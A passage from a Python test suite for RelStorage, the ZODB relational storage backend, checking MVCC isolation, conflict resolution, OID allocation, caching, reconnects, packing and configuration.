c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root[3], but due to MVCC,
# it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
# make root[3] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = TransactionMetaData()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
# Once again, history free automatically invalidated.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
# the storage directly. NOTE: The load connection must be open.
# to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
# Choose the pack time to be that last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
# on whether the accelerated implementation is in use. Also ,the pure-python
# version on PyPy can raise IndexError
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
# The after completion method, which can only be called
# outside of 2-phase commit is otherise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
ADAPTER=self.get_adapter_zconfig()
)
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
# Now, add some additional revisions. This proves that we iterate latest reconds,
# not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
# (0, 1, 2) by default, or, e.g, (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
class AbstractRSZodbConvertTests(StorageCreatingMixin,
ZlibWrappedFSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
# Zap the storage
self.make_storage(zap=True).close()
def make_storage(self, zap=True): # pylint:disable=arguments-differ
if self.relstorage_name == 'source':
meth = self._create_src_storage
else:
meth = self._create_dest_storage
storage = meth()
if zap:
storage.zap_all(slow=self.zap_slow)
return storage
def _cfg_header(self):
return '%import relstorage\n' + super(AbstractRSZodbConvertTests, self)._cfg_header()
def _cfg_relstorage(self, name, _path, blob_dir):
cfg = dedent("""
<relstorage>
%(rs_config)s
keep-history %(rs_keep_history)s
blob-dir %(rs_blobs)s
cache-prefix %(rs_name)s
cache-local-dir %(rs_cache_path)s
</relstorage>
""" % {
'rs_name': name,
'rs_keep_history': 'true' if self.keep_history else 'false',
'rs_blobs': blob_dir,
'rs_config': self.get_adapter_zconfig(),
'rs_cache_path': os.path.abspath('.'),
})
return cfg
def _cfg_one(self, name, path, blob_dir):
if name == self.filestorage_name:
meth = self._cfg_filestorage
else:
assert name == self.relstorage_name
meth = self._cfg_relstorage
return meth(name, path, blob_dir)
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
self.assertEqual(new_storage.copyTransactionsFrom,
new_storage.base.copyTransactionsFrom)
class AbstractRSDestHPZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = True
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSDestHFZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = False
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
src_db_needs_closed_before_zodbconvert = False
filestorage_name = 'destination'
relstorage_name = 'source'
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
